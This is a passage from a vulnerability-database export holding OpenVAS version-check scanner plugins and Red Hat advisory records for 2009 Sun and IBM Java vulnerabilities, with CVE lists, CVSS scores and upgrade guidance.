12:10:34Z santu $\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\n Impact Level: System/Application.\";\ntag_affected = \"Sun Java JDK/JRE 6 prior to 6 Update 17\n Sun Java JDK/JRE 5 prior to 5 Update 22\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Windows.\";\ntag_insight = \"Multiple flaws occur due to,\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n - Error when verifying 'HMAC' digests.\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n - Unspecified error due to improper parsing of color profiles of images.\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n - Three unspecified errors when processing audio or image files.\";\ntag_solution = \"Upgrade to JDK/JRE version 6 Update 17 or later.\n http://java.sun.com/javase/downloads/index.jsp\n OR\n Upgrade to JDK/JRE version 5 Update 22\n http://java.sun.com/javase/downloads/index_jdk5.jsp\n OR\n Upgrade to JDK/JRE version 1.4.2_24\n http://java.sun.com/j2se/1.4.2/download.html\n OR\n Upgrade to JDK/JRE version 1.3.1_27\n http://java.sun.com/j2se/1.3/download.html\";\ntag_summary = \"This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.\";\n\nif(description)\n{\n script_id(800972);\n script_version(\"$Revision: 7699 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37231\");\n script_xref(name : \"URL\" , value : \"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JDK_or_JRE/Win/installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\ni = 0;\nif(jreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\")) {\n version[i] = jreVer;\n i++;\n}\n\nif(jdkVer = get_kb_item(\"Sun/Java/JDK/Win/Ver\")) {\n version[i] = jdkVer;\n}\n\nforeach ver (version)\n{\n if(ver)\n {\n # Check for 1.3 < 1.3.1_27, 1.4 < 1.4.2_24, 1.5 < 1.5.0_22 (5 Update 22),\n # and 1.6 < 1.6.0_17 (6 Update 17)\n if(version_in_range(version:ver, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:ver, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:ver, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:ver, test_version:\"1.6\", test_version2:\"1.6.0.16\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66469", "href": "http://plugins.openvas.org/nasl.php?oid=66469", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1643", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1643.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1643 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66469);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1643\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1643.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0217", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1694.\n\nThe IBM 1.6.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-0217, CVE-2009-3865, CVE-2009-3866,\nCVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872,\nCVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR7 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-12-30T00:00:00", "id": "OPENVAS:66543", "href": "http://plugins.openvas.org/nasl.php?oid=66543", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1694", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1694.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1694 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1694.\n\nThe IBM 1.6.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-0217, CVE-2009-3865, CVE-2009-3866,\nCVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872,\nCVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR7 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66543);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-0217\", \"CVE-2009-3865\", \"CVE-2009-3866\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1694\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1694.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.7~1jpp.3.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-accessibility\", rpm:\"java-1.6.0-ibm-accessibility~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.7~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:59", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.", "modified": "2017-09-08T12:08:19", "published": "2009-12-08T05:00:00", "id": "RHSA-2009:1647", "href": "https://access.redhat.com/errata/RHSA-2009:1647", "type": "redhat", "title": "(RHSA-2009:1647) Critical: java-1.5.0-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2009-12-07T05:00:00", "id": "RHSA-2009:1643", "href": "https://access.redhat.com/errata/RHSA-2009:1643", "type": "redhat", "title": "(RHSA-2009:1643) Critical: java-1.4.2-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0217", "CVE-2009-3555", "CVE-2009-3865", "CVE-2009-3866", "CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.6.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-0217, CVE-2009-3865, CVE-2009-3866,\nCVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872,\nCVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR7 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-09-08T11:55:41", "published": "2009-12-23T05:00:00", "id": "RHSA-2009:1694", "href": "https://access.redhat.com/errata/RHSA-2009:1694", "type": "redhat", "title": "(RHSA-2009:1694) Critical: java-1.6.0-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:47", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555", "CVE-2009-3867", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3874", "CVE-2009-3875"], "description": "The IBM 1.4.2 SR13-FP4 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes various vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2009-3555, CVE-2009-3867, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3874, CVE-2009-3875)\n\nFor the CVE-2009-3555 issue, this update disables renegotiation in the\nnon-default IBM JSSE2 provider for the Java Secure Socket Extension (JSSE)\ncomponent. The default JSSE provider is not updated with this fix. Refer to\nthe IBMJSSE2 Provider Reference Guide, linked to in the References, for\ninstructions on how to configure the IBM Java 2 Runtime Environment to use\nthe JSSE2 provider by default.\n\nWhen using the JSSE2 provider, unsafe renegotiation can be re-enabled using\nthe com.ibm.jsse2.renegotiate property. Refer to the following\nKnowledgebase article for details:\nhttp://kbase.redhat.com/faq/docs/DOC-20491\n\nWarning: Do not install these java-1.4.2-ibm packages for SAP alongside the\njava-1.4.2-ibm packages from the Red Hat Enterprise Linux Extras or\nSupplementary channels on the Red Hat Network. Doing so could cause your\nsystem to fail to update cleanly, among other possible problems.\n\nAll users of java-1.4.2-ibm for Red Hat Enterprise Linux 4 and 5 for SAP\nare advised to upgrade to these updated packages, which contain the IBM\n1.4.2 SR13-FP4 Java release. All running instances of IBM Java must be\nrestarted for this update to take effect.\n", "modified": "2017-09-08T12:08:08", "published": "2010-05-12T04:00:00", "id": "RHSA-2010:0408", "href": "https://access.redhat.com/errata/RHSA-2010:0408", "type": "redhat", "title": "(RHSA-2010:0408) Moderate: java-1.4.2-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The Sun 1.5.0 Java release includes the Sun Java 